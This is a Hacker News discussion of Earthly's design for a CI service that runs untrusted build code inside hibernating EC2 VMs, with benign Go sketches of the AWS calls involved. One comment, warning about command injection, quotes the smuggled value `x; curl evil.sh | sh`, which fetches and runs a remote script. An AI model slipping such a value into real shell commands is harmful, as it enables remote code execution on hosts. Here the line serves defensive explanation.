[HN Gopher] Remote Code Execution as a Service
___________________________________________________________________
Remote Code Execution as a Service
Author : dijit
Score : 43 points
Date : 2023-03-07 19:29 UTC (3 hours ago)
(HTM) web link (earthly.dev)
(TXT) w3m dump (earthly.dev)
| rafark wrote:
| Aren't servers remote execution services?
| seanw444 wrote:
| You mean a VPS? Yes. An HTTP server, no. At least not by
| default / design.
| rkeene2 wrote:
| I also allow remote code execution, though interactively [0].
| I'm not using any VMs or anything like that for isolation,
| however.
|
| Note: All the interesting stuff is in /opt/appfs
|
| [0] https://rkeene.dev/js-repl/?arg=bash
| phphphphp wrote:
| Perhaps a dumb question, but container breakouts are a problem
| for all sorts of services and have been addressed in different
| ways. Since your goal is not to prevent container breakouts but
| rather to securely run third-party code, why did you choose EC2
| over something like ECS, Lambda, or Google Cloud Run, which
| already deal with the security aspect on your behalf? Virtual
| machines seem less secure and less convenient.
| adamgordonbell wrote:
| Good question. Our goal is not just to run arbitrary code but to
| run it fast and cache work to avoid redoing it. We are a CI
| service, and speed is important. Brandon may be able to jump in
| on why we didn't go with the various managed options, but it's
| hard to beat giving users powerful cloud machines to run their
| builds on.
|
| I did try to run BuildKit in a Lambda, as I thought that would
| be a low-cost option, but I found that you can't make gRPC calls
| against a Lambda, and that is a hard requirement for us.
| AlexCoventry wrote:
| Are you concerned about AWS launching a competing service if
| you get significant traction?
| brandonschurman wrote:
| Part of the reason we went with EC2 over something like ECS is
| that we would need to run the container in privileged mode for
| some of our features to work. We also considered options
| like gVisor, but ultimately the EC2 route was a simple enough
| implementation that made it easy to manage the user's cache
| volumes, etc. We're also hoping to use Firecracker VMs in the
| near future.
| adamgordonbell wrote:
| Thanks for sharing this. One of the authors here.
|
| We built a service that executes arbitrary user-submitted code.
| An RCE service. It's the thing you're not supposed to build, but
| we had to do it.
|
| Running arbitrary code means containers weren't a good fit
| (container breakouts happen), so we are spinning up and down EC2
| instances. This means we have actual infrastructure as code
| (i.e., not just piles of Terraform, but Go code running in a
| service that spins up and down VMs based on API calls).
|
| The service spins up and down EC2 instances based on user
| requests and executes user-submitted build scripts inside them.
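|
| Roughly, the launch path looks something like this (a simplified
| sketch using the AWS SDK for Go v2; the AMI ID, instance type,
| and volume size are placeholders, not our real settings):
|
|   package main
|
|   import (
|       "context"
|       "log"
|
|       "github.com/aws/aws-sdk-go-v2/aws"
|       "github.com/aws/aws-sdk-go-v2/config"
|       "github.com/aws/aws-sdk-go-v2/service/ec2"
|       "github.com/aws/aws-sdk-go-v2/service/ec2/types"
|   )
|
|   // launchBuildInstance starts a fresh build VM with hibernation
|   // enabled (hibernation must be configured at launch time).
|   func launchBuildInstance(
|       ctx context.Context, c *ec2.Client,
|   ) (string, error) {
|       out, err := c.RunInstances(ctx, &ec2.RunInstancesInput{
|           ImageId:      aws.String("ami-0123456789abcdef0"),
|           InstanceType: types.InstanceTypeC5Xlarge,
|           MinCount:     aws.Int32(1),
|           MaxCount:     aws.Int32(1),
|           // Hibernation needs an encrypted root volume large
|           // enough to hold the instance's RAM contents.
|           HibernationOptions: &types.HibernationOptionsRequest{
|               Configured: aws.Bool(true),
|           },
|           BlockDeviceMappings: []types.BlockDeviceMapping{{
|               DeviceName: aws.String("/dev/xvda"),
|               Ebs: &types.EbsBlockDevice{
|                   Encrypted:  aws.Bool(true),
|                   VolumeSize: aws.Int32(100),
|               },
|           }},
|       })
|       if err != nil {
|           return "", err
|       }
|       return *out.Instances[0].InstanceId, nil
|   }
|
|   func main() {
|       cfg, err := config.LoadDefaultConfig(context.Background())
|       if err != nil {
|           log.Fatal(err)
|       }
|       id, err := launchBuildInstance(
|           context.Background(), ec2.NewFromConfig(cfg))
|       if err != nil {
|           log.Fatal(err)
|       }
|       log.Println("launched build instance", id)
|   }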
|
| It's not the standard web service we were used to building, so we
| thought we'd write it up and share it with anyone interested.
|
| One cool thing we learned was how quickly you can Hibernate and
| wake up x86 EC2 instances. That ended up being a game-changer for
| us.
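|
| The hibernate/wake side is just two more EC2 API calls. Another
| rough sketch, reusing the client and imports from above (this
| only works when hibernation was configured at launch):
|
|   // hibernate writes RAM to the encrypted EBS root volume and
|   // stops the instance, so we stop paying for compute.
|   func hibernate(
|       ctx context.Context, c *ec2.Client, id string,
|   ) error {
|       _, err := c.StopInstances(ctx, &ec2.StopInstancesInput{
|           InstanceIds: []string{id},
|           Hibernate:   aws.Bool(true),
|       })
|       return err
|   }
|
|   // wake restores the saved RAM image, so BuildKit comes back
|   // with its in-memory state instead of doing a cold start.
|   func wake(
|       ctx context.Context, c *ec2.Client, id string,
|   ) error {
|       _, err := c.StartInstances(ctx, &ec2.StartInstancesInput{
|           InstanceIds: []string{id},
|       })
|       return err
|   }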
|
| Corey and Brandon did the building; I'm mainly just the person
| who wrote things down. Hopefully people find this interesting.
| plicense wrote:
| I would suggest also looking at
| https://github.com/bazelbuild/remote-apis. It's essentially a
| standard API for remote (any binary) execution as a service,
| and there are several reference implementations of it
| (BuildGrid, BuildBarn, Google's own service, etc.).
|
| And you can consider using gVisor to minimize container
| breakouts to a great extent.
| adamgordonbell wrote:
| I'll check out that remote-apis link.
|
| gVisor was considered, but so far it looks like the next
| iteration will be using Firecracker VMs. Our backend is
| BuildKit, and it can't run in gVisor containers without some
| work.
| xxpor wrote:
| Did you consider using firecracker?
| adamgordonbell wrote:
| Yeah, we totally did, and Corey has actually been playing
| around with a POC for backing this with Firecracker. It's
| likely the next revision of this will use Firecracker.
|
| So it wasn't so much disqualified as we decided it wouldn't
| be the v1 solution. We wanted to get something out, get
| people on it, and get feedback, so we weren't afraid to
| spend some more compute dollars to do so.
| k__ wrote:
| I had the impression that's what fly.io was doing.
|
| Converting Docker images to run in VMs instead of containers.
| slondr wrote:
| Fly uses Firecracker microVMs, like AWS Lambda does, not
| full-fledged VMs like EC2.
| cptnntsoobv wrote:
| > One cool thing we learned was how quickly you can Hibernate
| and wake up x86 EC2 instances. That ended up being a game-
| changer for us.
|
| Could you talk more about it? Are you keeping a cache of
| hibernated EC2 instances and re-launching them per request?
| What sort of relaunch latency profile do you see as a function of
| instance memory size?
| adamgordonbell wrote:
| A specific EC2 instance is always serving one customer max.
| And builds are highly cacheable, so the EC2 instance has an
| EBS volume on it with a big cache that Earthly uses to
| prevent rework.
|
| That instance is just sitting around waiting for gRPC requests
| that tell it to run another build. If it's idle for 30 minutes,
| it hibernates, and when another call comes in, a gRPC proxy
| wakes it back up.
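|
| The proxy-side logic is roughly this (an illustrative sketch,
| not our actual code; wake and hibernate stand in for the EC2
| start / stop-with-hibernate calls):
|
|   package proxy
|
|   import (
|       "context"
|       "sync"
|       "time"
|   )
|
|   const idleTimeout = 30 * time.Minute
|
|   type instanceProxy struct {
|       mu        sync.Mutex
|       lastUsed  time.Time
|       awake     bool
|       wake      func(context.Context) error // StartInstances
|       hibernate func(context.Context) error // StopInstances
|   }
|
|   // touch is called for every incoming build request; it wakes
|   // the instance if it was hibernated and resets the idle timer.
|   func (p *instanceProxy) touch(ctx context.Context) error {
|       p.mu.Lock()
|       defer p.mu.Unlock()
|       if !p.awake {
|           if err := p.wake(ctx); err != nil {
|               return err
|           }
|           p.awake = true
|       }
|       p.lastUsed = time.Now()
|       return nil
|   }
|
|   // reap runs periodically and hibernates the instance once it
|   // has been idle for the full timeout.
|   func (p *instanceProxy) reap(ctx context.Context) {
|       p.mu.Lock()
|       defer p.mu.Unlock()
|       if p.awake && time.Since(p.lastUsed) > idleTimeout {
|           if err := p.hibernate(ctx); err == nil {
|               p.awake = false
|           }
|       }
|   }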
|
| I don't know if the wake-up time increases with the size of
| the cache in memory (I can check with Brandon), but it's much
| faster than starting up an instance cold, mainly because
| BuildKit is designed for throughput and not a quick startup.
|
| There are more details in the blog.
| iueotnmunto wrote:
| While container breakouts do happen, they're pretty rare. I'd
| be more concerned about any potential injection vectors in the
| Go code, which could lead to a cloud breach if you're not
| careful ;)
| adamgordonbell wrote:
| Oh interesting. What were you imagining as the injection
| vector?
|
| The Earthly backend runs on a modified BuildKit, so it is
| running the arbitrary code in a container, but that container
| is also inside its own VM. This was simpler than Firecracker
| to get started with, but it turned out to have pretty good
| performance and alright cost once we started suspending things.
| iueotnmunto wrote:
| More if you're running `provision --vm-name
| "$UserSuppliedData"` or similar. I don't know how you've
| built your wrapping tool, so I can't comment on how likely
| it would be, but I've seen such breakages IRL (I break
| things for a living ;) )
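|
| As a toy illustration (Go, nothing to do with Earthly's actual
| tooling), the difference is between splicing the value into a
| shell string and passing it as a plain argument:
|
|   package provisioner
|
|   import "os/exec"
|
|   // provisionVM builds the command for a hypothetical
|   // `provision` CLI, where name comes straight from user input.
|   func provisionVM(name string) *exec.Cmd {
|       // Unsafe: splicing the name into a shell string means a
|       // value like `x; curl evil.sh | sh` runs arbitrary
|       // commands on the host:
|       //   exec.Command("sh", "-c", "provision --vm-name "+name)
|
|       // Safer: pass it as a discrete argv element so no shell
|       // ever parses it (the tool must still treat it as data).
|       return exec.Command("provision", "--vm-name", name)
|   }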
| brandonschurman wrote:
| Good point; we do have things locked down pretty well in
| our Go code, though. The instances can only be provisioned
| using an API, and that API doesn't allow for arbitrary
| user-supplied input.
| raesene9 wrote:
| There have been a bunch of Linux kernel privesc vulns that
| can be converted to container breakouts from standard Linux
| containers; just look at the bounties from Google's kCTF
| (AFAIK they've had 10 different kernel vulns in 2 years).
|
| It's possible to mitigate/reduce them for sure, with
| appropriate hardening, but the Linux kernel is still quite a
| big attack surface.
| flangola7 wrote:
| What about kernels like seL4? I think everyone will abandon
| monolithic kernels one day because they have too much
| attack surface.
| [deleted]
| [deleted]
___________________________________________________________________
(page generated 2023-03-07 23:01 UTC)